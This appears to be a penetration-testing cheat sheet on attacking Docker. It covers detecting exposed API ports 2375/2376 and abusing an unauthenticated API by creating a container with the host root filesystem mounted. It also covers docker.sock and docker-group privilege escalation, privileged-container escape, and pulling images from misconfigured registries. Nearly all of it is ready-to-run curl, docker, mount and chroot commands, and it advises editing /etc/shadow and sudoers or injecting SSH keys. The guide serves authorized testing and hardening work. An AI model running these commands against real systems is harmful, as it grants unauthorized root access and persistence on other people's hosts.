Docker - Port 2375,2376

Basic info

Docker is a widely used containerization platform that allows developers to package applications with their dependencies into isolated units. However, misconfigurations, exposed APIs, and poor access control practices can create serious security risks. This guide provides comprehensive techniques for Docker penetration testing, focusing on real-world attack vectors, privilege escalation, container escape, and host exploitation.

Identifying Docker in a Target Environment

Detecting Docker Services via Network Scanning

Docker’s remote API may be exposed on:

• Port 2375 (unencrypted)

• Port 2376 (TLS-encrypted)

Scan using Nmap:

nmap -p 2375,2376 --script http-title,http-docker-registry <target-ip>

Check for Docker API access:

curl http://<target-ip>:2375/containers/json

If you receive JSON output, the Docker API is unauthenticated and exposed.

Exploiting Exposed Docker API

Listing Containers

curl http://<target-ip>:2375/containers/json

Running a New Container (Interactive Shell)

curl -X POST http://<target-ip>:2375/containers/create -H "Content-Type: application/json" \
-d '{"Image":"alpine", "Cmd":["/bin/sh"], "HostConfig": {"Binds":["/:/host"]}}'

Then start it:

curl -X POST http://<target-ip>:2375/containers/<container_id>/start

Access with:

curl -X POST -H "Content-Type: application/json" \
http://<target-ip>:2375/containers/<container_id>/exec \
-d '{"AttachStdout": true, "AttachStderr": true, "Tty": true, "Cmd": ["/bin/sh"]}'

This allows you to escape to the host by accessing /host.

Docker Socket Abuse (/var/run/docker.sock)

When Docker is exposed via the Docker socket, it allows root-level control over the host.

Check access:

ls -la /var/run/docker.sock

Privilege Escalation via Docker Socket

If you have write access to docker.sock, you can create a container with the host mounted:

docker run -v /:/mnt --rm -it alpine chroot /mnt

This drops you into the host filesystem as root.

Container Escape Techniques

1. Privileged Containers

Check if container runs with --privileged:

cat /proc/1/cgroup

If you see docker with no restrictions, and cap_sys_admin, then:

mount -t proc proc /host/proc
chroot /host /bin/bash

2. Mounting Host Filesystems

Containers running with -v /:/mnt allow direct access to the host’s root filesystem.

Escalate:

chroot /mnt

Then modify /etc/shadow, /etc/sudoers, or inject SSH keys.

Detecting Docker Environment From Inside a Container

Check for containerized environment:

cat /proc/1/cgroup | grep -i docker
grep -q 'docker' /proc/self/cgroup && echo "Running in Docker"

Look for environment variables like:

env | grep -i docker

Presence of /docker-entrypoint.sh, /var/run/docker.sock, or .dockerenv are telltale signs.

Attacking Misconfigured Docker Registries

Discovering Registries

nmap -p 5000 --script http-title,http-docker-registry <target>

Access registry:

curl http://<target>:5000/v2/_catalog

List tags:

curl http://<target>:5000/v2/<image>/tags/list

Pull vulnerable images:

docker pull <target>:5000/<image>:<tag>

Analyze locally for secrets or backdoors.

Privilege Escalation via Docker Group Membership

If a user is in the docker group, they can effectively become root:

docker run -v /:/mnt --rm -it alpine chroot /mnt

Check:

groups

If docker is listed, the user has full control over the host.